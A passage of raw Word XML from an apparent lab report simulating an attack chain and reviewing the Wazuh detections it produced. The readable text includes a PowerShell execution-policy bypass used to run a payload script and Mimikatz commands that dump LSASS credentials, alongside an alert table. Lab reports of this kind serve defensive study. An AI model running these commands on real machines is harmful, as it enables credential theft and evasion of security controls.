                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4565015" cy="313944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4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>401320</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>74930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4565015" cy="371157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rcRect l="9990" t="24973" r="9990" b="9990"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4565015" cy="3711575"/>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Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>5. Defense Evasion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PowerShell execution policies initially blocked the payload execution attempt. An execution policy bypass was then used to simulate adversary defense evasion techniques. The payload executed successfully after bypassing PowerShell restrictions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Commands Executed:           </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>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Powershell -ExecutionPolicy Bypass-File .\payl.ps1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>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drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="45">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>354330</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>24765</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4849495" cy="4280535"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>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4"/>
                    <a:srcRect l="9990" t="24973" r="4995" b="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4849495" cy="4280535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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2"/>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r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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731510" cy="4298315"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4298315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>6. Credential Access Simulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Credential access activities were simulated using Mimikatz within the isolated lab environment. Attempts to interact with LSASS and credential material demonstrated post-exploitation behavior and generated defensive telemetry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Commands Executed:</w:t>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Privilege::debug</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>lsadump::lsa</w:t>
              <w:br/>
              <w:t>sekurlsa::logonpasswords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="47">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>372745</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="282067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6"/>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8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>22225</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="2820670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>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17"/>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49">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>447675</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="2820670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="1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
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2820670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>7. Blue Team Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Wazuh successfully generated telemetry for multiple stages of the simulated attack chain. Detections included PowerShell execution, suspicious process creation, credential access attempts, and encoded command execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8591" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="59" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2100"/>
        <w:gridCol w:w="2168"/>
        <w:gridCol w:w="2155"/>
        <w:gridCol w:w="2168"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2100" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2168" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Alert Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2155" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2168" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2100" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2026-05-11 19:40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2168" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Suspicious PowerShell Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2155" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows Victim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2168" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Payload delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2100" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2026-05-11 19:45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2168" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Execution Policy Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2155" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows Victim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2168" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Defense evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2100" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2026-05-11 19:48</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2168" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Process Creation - calc.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2155" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows Victim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2168" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Payload execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2100" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2026-05-11 20:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2168" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Credential Access Attempt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2155" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows Victim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2168" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="hack" w:hAnsi="hack"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Mimikatz activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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50">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>26035</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>513715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="2820670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="1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
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>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51">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-78105</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>143510</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="2820670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="1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
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2820670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
